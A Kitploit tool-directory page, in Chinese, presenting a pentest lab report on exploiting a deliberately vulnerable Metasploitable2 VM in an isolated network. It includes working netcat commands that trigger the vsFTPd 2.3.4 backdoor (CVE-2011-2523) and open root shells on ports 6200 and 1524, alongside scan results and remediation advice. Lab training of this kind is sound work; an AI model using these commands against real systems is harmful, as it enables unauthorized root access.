Skip to content
KitploitKITPLOIT
工具漏洞利用博客
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pentest-lab-metasploitable2 — 隔离网络渗透测试实验室:使用 nmap/nikto 进行枚举,并手动利用 Metasploitable2(vsFTPd 后门 CVE-2011-2523、bindshell),附带完整技术报告。 | Kitploit
工具/GitHubGitHub/danreis20/pentest-lab-metasploitable2
侦察Web漏洞扫描器网络映射漏洞分析漏洞利用CTF渗透测试论文与研究学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
实验室与实践
GitHubdanreis20/pentest-lab-metasploitable2

pentest-lab-metasploitable2

隔离网络渗透测试实验室:使用 nmap/nikto 进行枚举,并手动利用 Metasploitable2(vsFTPd 后门 CVE-2011-2523、bindshell),附带完整技术报告。

查看仓库
113小时4分前尚未审核

隔离网络中的渗透测试实验室

作者: Daniel Stefan de Jesus dos Reis 日期: 2026年9月 环境: 隔离虚拟网络 pentestlab 中的个人 KVM 实验室

范围与授权声明

本次测试仅针对一台自有且故意存在漏洞的虚拟机进行,该虚拟机由 Rapid7 专门分发用于攻击性安全培训,位于一个无互联网出口的隔离虚拟网络中。未访问任何第三方系统。本项目仅用于教育目的,旨在培养入侵测试技能。

1. 实验室架构

  • Hypervisor: KVM/libvirt
  • 虚拟网络: pentestlab(网桥 virbr-lab),子网 192.168.100.0/24,未配置 <forward> —— 即一个真正隔离的网络:虚拟机之间以及与宿主机之间可以通信,但没有通往实验室外部的路由。网络 XML 见 evidencias/pentestlab_network.xml。
  • 攻击主机: 宿主机本身,使用 virbr-lab 接口,配备 nmap、nikto、gobuster、hydra、sqlmap 和 netcat。
  • 目标: 虚拟机 metasploitable2(Metasploitable2,修改版 Ubuntu 8.04),IP 192.168.100.90/24,通过隔离网络自身的 DHCP 分配。
root@kitploit:~
[ Host / Atacante ]  
        |
   virbr-lab (rede isolada, sem saída para internet)
        |
[ metasploitable2 ] 

2. 方法论

我遵循了基本的流程:侦察 → 枚举 → 利用 → 记录:

  1. 主机发现及使用服务/版本检测的完整 TCP 端口扫描(nmap -sV -sC -p-)
  2. Web 漏洞扫描(nikto)
  3. 根据识别出的版本,优先处理已知漏洞(CVE)
  4. 手动利用,以下所有步骤均使用 nc 完成,以理解每个漏洞的机制,而不仅仅是“运行漏洞利用程序”
  5. 记录证据及修复建议

3. 侦察 —— 完整扫描

命令:nmap -sV -sC -p- -T4 192.168.100.90 完整输出:evidencias/nmap_full_scan.txt

发现的最相关服务摘要:

4. 已利用的漏洞(已确认)

4.1 vsFTPd 2.3.4 后门 —— CVE-2011-2523(严重)

2011年6月30日至2011年7月3日期间,可供下载的 vsFTPd 2.3.4 源代码被攻击者篡改。被植入后门的版本包含一个后门:当 FTP 登录的用户名字段收到以 :) 结尾的字符串时,服务器会在 TCP 端口 6200 上打开一个 root shell,无需任何认证。

执行的步骤(完整日志见 evidencias/vsftpd_backdoor_exploit.txt):

root@kitploit:~
# 1. Disparar a backdoor enviando USER terminado em ":)"
( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21

# 2. Conectar na porta 6200, aberta pela backdoor
( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200

结果:

root@kitploit:~
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

在无需认证的情况下获得了完整的 root 访问权限。

4.2 端口 1524/tcp 上暴露的 Bindshell(严重)

nmap 已将该服务识别为 Metasploitable root shell —— 这是镜像中故意留下的后门(先前漏洞利用的残留,在培训镜像中很常见)。无需利用:直接连接即可。

root@kitploit:~
( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524

结果: uid=0(root) gid=0(root) groups=0(root) —— 立即获得 root。

完整日志见 evidencias/bindshell_1524.txt。

5. 已识别的漏洞(本轮未利用)

5.1 UnrealIRCd 3.2.8.1 —— CVE-2010-2075(严重,通过版本识别)

运行在端口 6667/6697 上的 UnrealIRCd 版本对应一个历史上带有后门的构建(命令 AB; 后跟一个 shell 命令)。我尝试通过 nc 手动触发该后门,但服务器将输入视为无效的 IRC 命令(451 :You have not registered),而不是执行命令 —— 要么该特定镜像不包含被木马化的二进制文件,要么该 payload 需要精细调整,而我在本轮中未优先处理。我将其记录为未成功的尝试,而非已确认的漏洞。

5.2 distccd 3632/tcp —— CVE-2004-2687(高)

分布式编译服务,接受任何连接客户端发送的任意命令,无需认证。通过版本识别,本轮未利用。

5.3 Java RMI Registry —— 端口 1099/tcp(高)

历史上易受通过反序列化实现的远程代码执行攻击。通过版本识别,本轮未利用。

6. Web 枚举(nikto)

命令:nikto -h 192.168.100.90 -p 80 完整输出:evidencias/nikto_scan.txt

主要发现:

  • Apache 2.2.8 已过时(当时的最新系列为 2.2.22+)
  • HTTP 方法 TRACE 处于启用状态(潜在的 XST)
  • /phpinfo.php 公开暴露(泄露 PHP 配置)
  • /phpMyAdmin/ 可访问,无 IP 限制
  • /doc/、/test/ 和 /icons/ 启用了目录列表
  • phpMyAdmin 的 Cookie 创建时未设置 httponly 标志

7. 修复建议

8. 本实验室在实践中展示了什么

  • 使用 nmap 进行网络侦察和枚举(完整扫描、服务/版本检测、NSE 脚本)
  • 理解真实后门(vsFTPd)的机制,并通过 netcat 手动利用,不依赖自动化框架
  • 使用 nikto 分析 Web 漏洞
  • 以报告格式记录入侵测试:范围、方法论、按严重程度排序的发现及修复建议
  • 维护一个隔离且安全的实验室环境(无互联网出口的虚拟网络)

9. 后续步骤

  • 使用确认被木马化的镜像版本重复 UnrealIRCd 的利用,以了结该发现
  • 向 pentestlab 网络添加第二台专用攻击机(例如 Kali Linux),而不是直接从宿主机发起攻击
  • 将该实验室扩展为 Active Directory 场景(另行规划的项目)
下载工具
端口服务版本备注
21/tcpFTPvsftpd 2.3.4允许匿名登录 + 已知后门
22/tcpSSHOpenSSH 4.7p1已过时
23/tcpTelnetLinux telnetd明文协议
25/tcpSMTPPostfix—
80/tcpHTTPApache 2.2.8 + PHP 5.2.4phpMyAdmin 和 phpinfo.php 暴露
139/445/tcpSMBSamba 3.0.20-Debian消息签名已禁用
1099/tcpJava RMIGNU Classpath grmiregistry历史上易受 RCE 攻击
1524/tcpbindshell—root shell 已开放,无需认证
3306/tcpMySQL5.0.51a-3ubuntu5—
3632/tcpdistccdv1历史上易受 RCE 攻击(CVE-2004-2687)
5432/tcpPostgreSQL8.3.0–8.3.7—
5900/tcpVNC协议 3.3—
6667/6697/tcpIRCUnrealIRCd 3.2.8.1该版本与已知后门相关
8180/tcpHTTPApache Tomcat 5.5—
发现建议
vsFTPd 2.3.4 后门切勿使用非官方/未经验证来源的二进制文件;安装前验证软件包的哈希/签名
端口 1524 上的 Bindshell定期审计开放端口(定期内部 nmap);任何未记录的 shell 都是安全事件
distccd 暴露且无认证通过防火墙限制为受信任主机,或在不进行活跃分布式构建时禁用
phpMyAdmin/phpinfo.php 暴露通过 IP/VPN 限制访问,切勿公开暴露管理工具
Apache/PHP 过时保持补丁管理流程处于活跃状态
启用了目录列表在 Apache 中禁用 Options Indexes
SMB 消息签名已禁用启用 server signing = mandatory